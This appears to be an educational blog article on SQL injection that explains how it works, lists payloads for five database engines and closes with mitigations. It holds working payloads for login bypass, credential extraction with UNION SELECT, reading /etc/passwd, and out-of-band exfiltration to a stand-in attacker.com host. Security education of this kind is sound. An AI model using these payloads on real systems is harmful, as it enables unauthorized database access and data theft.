SQL Injection (SQLi): Deep Dive into Attacks, Payloads, Impacts, and Mitigation

SQL Injection (SQLi) remains one of the most dangerous and widely exploited web application vulnerabilities, despite being well understood…

Subhash Pathak

~4 min read · February 6, 2026 (Updated: February 6, 2026) · Free: Yes

SQL Injection (SQLi) remains one of the most dangerous and widely exploited web application vulnerabilities, despite being well understood for decades. It consistently appears in the OWASP Top 10 because of its ease of exploitation and severe impact — from full database compromise to total business disruption.

This article provides a comprehensive technical and business-focused breakdown of SQL Injection, including:

What SQL is and how SQL Injection works
How to identify SQL injection vulnerabilities
Common and advanced SQLi payloads
Types of SQL injection attacks
Technical and business impact
Database-specific payloads (MySQL, MSSQL, PostgreSQL, SQLite, Oracle)
Effective mitigation strategies

What Is SQL?

SQL (Structured Query Language) is a standard language used to store, retrieve, update, and delete data in relational databases. Applications use SQL queries to interact with backend databases such as MySQL, Microsoft SQL Server, PostgreSQL, Oracle, and SQLite.

Example SQL query:

SELECT * FROM users WHERE username = 'admin' AND password = 'password123';

When applications improperly handle user input, attackers can manipulate these queries — this is where SQL Injection begins.

What Is SQL Injection?

SQL Injection is a vulnerability that allows an attacker to inject malicious SQL code into an application's database query. This occurs when user input is concatenated directly into SQL statements without proper validation or parameterization.

Vulnerable Code Example

SELECT * FROM users WHERE username = '$username' AND password = '$password';

If an attacker enters:

' OR '1'='1

The query becomes:

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';

This condition always evaluates to true, allowing authentication bypass.

How to Identify SQL Injection Vulnerabilities

1. Error-Based Indicators

SQL syntax errors in responses
Database error messages
HTTP 500 Internal Server Error after input manipulation

Example input:

Possible response:

You have an error in your SQL syntax near...

2. Boolean-Based Testing

Inject conditions and observe differences in responses.

' AND 1=1 --
' AND 1=2 --

If one returns normal content and the other does not, SQL injection is likely.

3. Time-Based Blind SQL Injection

Used when no output or error messages are displayed.

' AND SLEEP(5) --

If the response is delayed, the query is being executed.

4. Out-of-Band Detection

Data is exfiltrated via DNS or HTTP requests from the database server.

LOAD_FILE(CONCAT('\\\\',(SELECT table_name FROM information_schema.tables LIMIT 1),'.attacker.com\\a'))

Types of SQL Injection Attacks

1. In-Band SQL Injection

Data is retrieved using the same channel as the attack.

a. Error-Based SQL Injection

Relies on verbose database errors.

' AND 1=CAST((SELECT @@version) AS INT)--
' AND 1=CONVERT(INT, (SELECT @@version))--   
LIMIT CAST((SELECT version()) as numeric)

b. Union-Based SQL Injection

Uses UNION SELECT to extract data.

' UNION SELECT username, password FROM users --
' UNION SELECT NULL, @@version, NULL--
' UNION SELECT 1, @@version, user() --

2. Blind SQL Injection

The application does not return query results directly.

a. Boolean-Based Blind SQLi

' AND (SELECT COUNT(*) FROM users)>0 --
' AND SUBSTRING(@@version,1,1)='M'--
' AND @@version LIKE 'Microsoft%'--

b. Time-Based Blind SQLi

' AND IF(1=1, SLEEP(5), 0) --
' IF (SUBSTRING(@@version,1,1)='M') WAITFOR DELAY '0:0:5'-- 
' OR IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0) --
' AND SLEEP(5)/*

3. Out-of-Band SQL Injection

Exploits features like DNS resolution or external requests.

'||(SELECT UTL_HTTP.REQUEST('http://'||(SELECT USER FROM DUAL)||'.attacker.com') FROM DUAL)||'

Common SQL Injection Payloads

Authentication Bypass

' OR '1'='1 --
admin' --

Data Enumeration

' UNION SELECT table_name, null FROM information_schema.tables --

Database Version Disclosure

' UNION SELECT @@version, null --

Database-Specific SQL Injection Payloads

MySQL / MariaDB

' OR 1=1 --
' UNION SELECT user(), database() --
' AND SLEEP(5) --
' UNION SELECT 1, table_name, 3 FROM information_schema.tables --
' UNION SELECT 1, @@version, user() --
' OR IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0) --
' UNION SELECT LOAD_FILE('/etc/passwd') --

Microsoft SQL Server (MSSQL)

' OR 1=1 --
' UNION SELECT @@version, name FROM sys.databases --
'; WAITFOR DELAY '00:00:05' --
' UNION SELECT @@version--
100;waitfor delay '0:0:10'--
' AND 1=CAST((SELECT @@version) AS INT)--
' AND SUBSTRING(@@version,1,1)='M'--
' AND @@version LIKE 'Microsoft%'--

SQLite

' OR 1=1 --
' UNION SELECT sqlite_version(), null --
' OR 1=1--
1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--
' UNION SELECT sqlite_version()--

PostgreSQL

' OR 1=1 --
' UNION SELECT version(), current_database() --
' AND pg_sleep(5) --

Oracle Database

' OR 1=1 --
' UNION SELECT banner FROM v$version --
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5) --

Technical Impact of SQL Injection

Unauthorized data access
Authentication bypass
Data manipulation or deletion
Database schema disclosure
Remote command execution (in extreme cases)
Complete backend compromise

Business Impact of SQL Injection

1. Data Breaches

Exposure of sensitive customer data, PII, credentials, or payment details.

2. Financial Loss

Regulatory fines (GDPR, HIPAA, PCI-DSS)
Incident response costs
Legal penalties

3. Reputational Damage

Loss of customer trust and brand credibility.

4. Operational Downtime

Application outages and service disruptions.

SQL Injection Mitigation Strategies

1. Parameterized Queries (Prepared Statements)

Most effective defense

SELECT * FROM users WHERE username = ? AND password = ?

2. Stored Procedures (Safely Implemented)

Avoid dynamic SQL inside procedures.

3. Input Validation

Whitelisting allowed characters
Length checks
Reject unexpected input

4. Least Privilege Principle

Database users should only have required permissions.

5. Web Application Firewalls (WAF)

Helps block known SQLi patterns.

6. Error Handling

Do not expose database errors to users.

7. Regular Security Testing

Static Application Security Testing (SAST)
Dynamic Application Security Testing (DAST)
Manual penetration testing

Final Thoughts

SQL Injection is not a legacy vulnerability — it is a modern threat that continues to cause large-scale breaches due to insecure coding practices. The combination of developer awareness, secure coding standards, and layered defenses is essential to eliminating SQLi risks.

If your application interacts with a database — and almost all do — SQL Injection should be treated as a top security priority.

#sql-injection #owasp-top-10 #database #vapt #sql